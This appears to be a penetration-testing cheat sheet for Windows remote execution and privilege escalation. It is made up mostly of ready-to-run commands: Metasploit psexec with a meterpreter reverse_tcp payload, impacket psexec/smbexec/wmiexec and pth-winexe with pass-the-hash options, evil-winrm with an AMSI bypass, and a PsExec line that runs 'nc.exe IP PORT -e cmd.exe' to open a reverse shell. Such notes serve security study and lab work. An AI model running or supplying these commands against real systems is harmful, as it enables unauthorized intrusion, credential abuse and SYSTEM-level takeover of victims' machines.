privesc tools
check if win-logon-creds are working
msf
use exploit/windows/smb/psexec
set PAYLOAD windows/x64/meterpreter/reverse_tcp
SHOW TARGETS
>set TARGET X
use exploit/windows/smb/psexec_psh
Note: psexec & evil-winrm uses port 5985
(powershell remote access)
psexec | smbexec | wmiexec
NOTE: psexec, smbexec will give SYSTEM shell. wmiexec will give user shell.
impacket-psexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-smbexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-wmiexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
evil-winrm
NOTE: evil-winrm usually gives medium integrity shells for added administrator accounts. Even if new account has Administrator permissions, cannot actually perform administrative actions with it.
# only USER, no DOMAIN needed
evil-winrm -i IP -u USER [-H NT-HASH | -p PASS]
# custom options
PS> menu
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
winexe
winexe -U 'DOMAIN/USER%PASS' //IP cmd.exe
pth-winexe
pth-winexe -U 'DOMAIN/USER%HASH' //IP cmd.exe
# --system needs local admin hash
pth-winexe [--system] -U 'administrator%NTLM:HASH' //IP cmd.exe
PsExec.exe
PS> .\PsExec64.exe -accepteula -i -s SHELL.exe
# i: Run process interactively
# s: Run remote process in the System account.
> PSExec64.exe -i -u "nt authority\local service" SHELL.exe
# u: Run process as user-account <>
# Run executable with a different user:pass
PS> .\PsExec.exe -accepteula -u USER -p PASS nc.exe IP PORT -e cmd.exe
Last updated
Was this helpful?